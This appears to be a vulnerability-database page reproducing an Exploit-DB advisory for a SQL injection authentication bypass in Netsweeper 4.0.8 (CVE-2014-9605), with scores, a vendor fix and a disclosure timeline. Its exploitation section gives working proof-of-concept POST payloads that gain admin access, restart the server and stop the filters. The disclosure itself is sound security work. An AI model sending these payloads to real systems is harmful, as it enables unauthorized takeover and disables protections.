Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAnastasios MonachosEDB-ID:37928
HistoryAug 21, 2015 - 12:00 a.m.

Netsweeper 4.0.8 - SQL Injection / Authentication Bypass

2015-08-2100:00:00
Anastasios Monachos
www.exploit-db.com
12

9.4 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:N/A:C

9.6 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

62.2%

JSON
+----------------------------------------------------------------+
+ Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +
+----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version 	: 4.0.8 (and probably other versions)
Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched      	: Yes
CVE		: CVE-2014-9605

+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.

+----------------------+
+ Exploitation Details +
+----------------------+
By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:
	i)   "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)
	ii)  "Restart" the server
	iii) "Stop the filters on the server"

Vulnerability Type: Authentication Bypass (using two single-quotes)
p0c: 	http://netsweeper/webupgrade/webupgrade.php
	POST: step=&login='&password='&show_advanced_output=                

p0c restart the server:
	http://netsweeper/webupgrade/webupgrade.php
	POST: step=12&login='&password='&show_advanced_output=
		
	followed by

	http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
	POST: step=12&restart=yes&show_advanced_output=false

p0c stop the filters on the server:
	http://netsweeper/webupgrade/webupgrade.php
	POST: step=9&stopservices=yes&show_advanced_output=

+----------+
+ Solution +
+----------+
Upgrade to latest version.

+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9605
11-Aug-2015: Public disclosure

Related

nvd 1
cvelist 1
cve 1
zdt 1
prion 1
exploitpack 1
openvas 1
nvd
nvd
CVE-2014-9605
2015-09-04 15:59:00
cvelist
cvelist
CVE-2014-9605
2015-09-04 15:00:00
cve
cve
CVE-2014-9605
2015-09-04 15:59:00
zdt
zdt
Netsweeper 4.0.9 - Multiple Vulnerabilities
2015-08-13 00:00:00
prion
prion
Sql injection
2015-09-04 15:59:00
exploitpack
exploitpack
Netsweeper 4.0.8 - SQL Injection Authentication Bypass
2015-08-21 00:00:00
openvas
openvas
Netsweeper Multiple Vulnerabilities (Aug 2015)
2015-08-25 00:00:00

9.4 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:N/A:C

9.6 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

62.2%

JSON
Related for EDB-ID:37928
nvd1cvelist1cve1zdt1prion1exploitpack1openvas1